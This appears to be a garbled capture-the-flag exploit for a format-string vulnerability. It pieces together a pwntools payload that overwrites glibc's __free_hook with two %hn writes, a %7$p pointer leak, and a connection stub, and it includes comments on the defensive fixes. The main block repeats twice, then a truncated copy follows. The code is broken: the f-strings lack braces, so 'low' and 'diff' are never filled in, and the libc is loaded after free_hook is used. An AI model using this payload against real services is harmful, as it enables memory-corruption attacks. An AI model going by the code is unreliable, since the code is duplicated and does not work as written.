# Build the format string.
# Layout: 8 filler bytes, two `%hn` directives (each stores a 16-bit count
# through the pointer at the referenced argument position), 8 more filler
# bytes, then the two pointers that the directives refer to.
#
# Defensive context: this primitive exists only when a service passes
# user-controlled bytes as the format argument of a printf-family call.
# A constant format string (`printf("%s", buf)`), -Wformat-security, and
# _FORTIFY_SOURCE=2 (which aborts on `%n` in a writable format string)
# remove it. glibc 2.34 and later also removed the malloc hooks from the API.
# NOTE(review): `free_hook` presumably holds the address of __free_hook;
# it is computed outside this excerpt.
payload = b"".join(
    [
        b'A' * 8,
        f"%lowc%8$hn".encode(),
        f"%diffc%9$hn".encode(),
        b'B' * 8,
        p64(free_hook),      # referenced as the 8th argument
        p64(free_hook + 2),  # referenced as the 9th argument
    ]
)

# The challenge provides the libc build that runs on the server; load that
# exact file rather than whatever libc is installed locally.
libc = ELF("libc-2.31.so")

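> echo %7$p
0x7f5c1a2b2e30

The address 0x7f5c1a2b2e30 is a high address (> 0x7f000000). That the service answers `%7$p` with a pointer value shows it passes user input to a printf-style function as the format string; on the service side the fix is a constant format string, e.g. `printf("%s", input)`.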

def main():
    """Open a connection to the challenge service at HOST:PORT.

    Only the connection setup is visible in this excerpt.
    """
    conn = remote(HOST, PORT)


# Build the format string.
# Layout: 8 filler bytes, two `%hn` directives (each stores a 16-bit count
# through the pointer at the referenced argument position), 8 more filler
# bytes, then the two pointers that the directives refer to.
#
# Defensive context: this primitive exists only when a service passes
# user-controlled bytes as the format argument of a printf-family call.
# A constant format string (`printf("%s", buf)`), -Wformat-security, and
# _FORTIFY_SOURCE=2 (which aborts on `%n` in a writable format string)
# remove it. glibc 2.34 and later also removed the malloc hooks from the API.
# NOTE(review): `free_hook` presumably holds the address of __free_hook;
# it is computed outside this excerpt.
payload = b"".join(
    [
        b'A' * 8,
        f"%lowc%8$hn".encode(),
        f"%diffc%9$hn".encode(),
        b'B' * 8,
        p64(free_hook),      # referenced as the 8th argument
        p64(free_hook + 2),  # referenced as the 9th argument
    ]
)

# The challenge provides the libc build that runs on the server; load that
# exact file rather than whatever libc is installed locally.
libc = ELF("libc-2.31.so")

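> echo %7$p
0x7f5c1a2b2e30

The address 0x7f5c1a2b2e30 is a high address (> 0x7f000000). That the service answers `%7$p` with a pointer value shows it passes user input to a printf-style function as the format string; on the service side the fix is a constant format string, e.g. `printf("%s", input)`.

# Build the format string
payload = b'A'*8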

def main(): io = remote(HOST, PORT)